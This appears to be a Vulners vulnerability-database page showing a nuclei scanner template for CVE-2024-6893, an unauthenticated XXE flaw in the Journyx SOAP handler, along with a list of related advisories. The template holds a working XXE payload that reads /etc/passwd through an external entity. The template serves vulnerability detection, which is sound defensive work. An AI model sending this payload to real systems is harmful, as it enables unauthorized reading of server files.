Lucene search
K

Journyx - XML External Entities Injection (XXE)

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 31 Views

Journyx - XML External Entities Injection (XXE) vulnerability in "soap_cgi.pyc" API handle

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Journyx 11.5.4 XML Injection Vulnerability
8 Aug 202400:00
zdt
Circl
CVE-2024-6893
8 Aug 202403:01
circl
CNNVD
Journyx 代码问题漏洞
7 Aug 202400:00
cnnvd
CVE
CVE-2024-6893
7 Aug 202423:22
cve
Cvelist
CVE-2024-6893 Journyx Unauthenticated XML External Entities Injection
7 Aug 202423:22
cvelist
KoreLogic Security
Journyx Unauthenticated XML External Entities Injection
7 Aug 202400:00
korelogic
NVD
CVE-2024-6893
8 Aug 202400:15
nvd
OSV
CVE-2024-6893
8 Aug 202400:15
osv
Packet Storm
Journyx 11.5.4 XML Injection
8 Aug 202400:00
packetstorm
Positive Technologies
PT-2024-37934
7 Aug 202400:00
ptsecurity
Rows per page
id: CVE-2024-6893

info:
  name: Journyx - XML External Entities Injection (XXE)
  author: s4e-io
  severity: high
  description: |
    The "soap_cgi.pyc" API handler allows the XML body of SOAP requests to contain references to external entities. This allows an unauthenticated attacker to read local files, perform server-side request forgery, and overwhelm the web server resources.
  impact: |
    Unauthenticated attackers can exploit XXE to read local files, perform SSRF attacks, and cause denial of service by overwhelming server resources.
  remediation: |
    Update Journyx to version 11.5.5 or later to address the XXE vulnerability.
  reference:
    - https://securityforeveryone.com/tools/journyx-xxe-cve-2024-6893
    - https://korelogic.com/Resources/Advisories/KL-001-2024-010.txt
    - https://packetstormsecurity.com/files/180005/Journyx-11.5.4-XML-Injection.html
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6893
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-6893
    cwe-id: CWE-611
    epss-score: 0.32916
    epss-percentile: 0.98152
  metadata:
    max-request: 1
    vendor: journyx
    product: journyx-jtime
    fofa-query: icon_hash="-109972155"
  tags: cve,cve2024,journyx,xxe,vkev,vuln

variables:
  pass: "{{rand_text_alpha(5)}}"

http:
  - raw:
      - |
        POST /jtcgi/soap_cgi.pyc HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        <?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM "file:///etc/passwd">]><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header/><soapenv:Body><changeUserPassword><username>&test;</username><curpwd>{{pass}}</curpwd><newpwd>{{pass}}</newpwd></changeUserPassword></soapenv:Body></soapenv:Envelope>

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "invalid password for user"
        condition: and

      - type: word
        part: header
        words:
          - "text/xml"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a018737210a862b298929bb3433fa7ad0d6537f6e8aff75c409eb45e1356b666022077845f843eca0a5756d07728127870fbaf678f2855c0e269b819b534f36fdb72:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation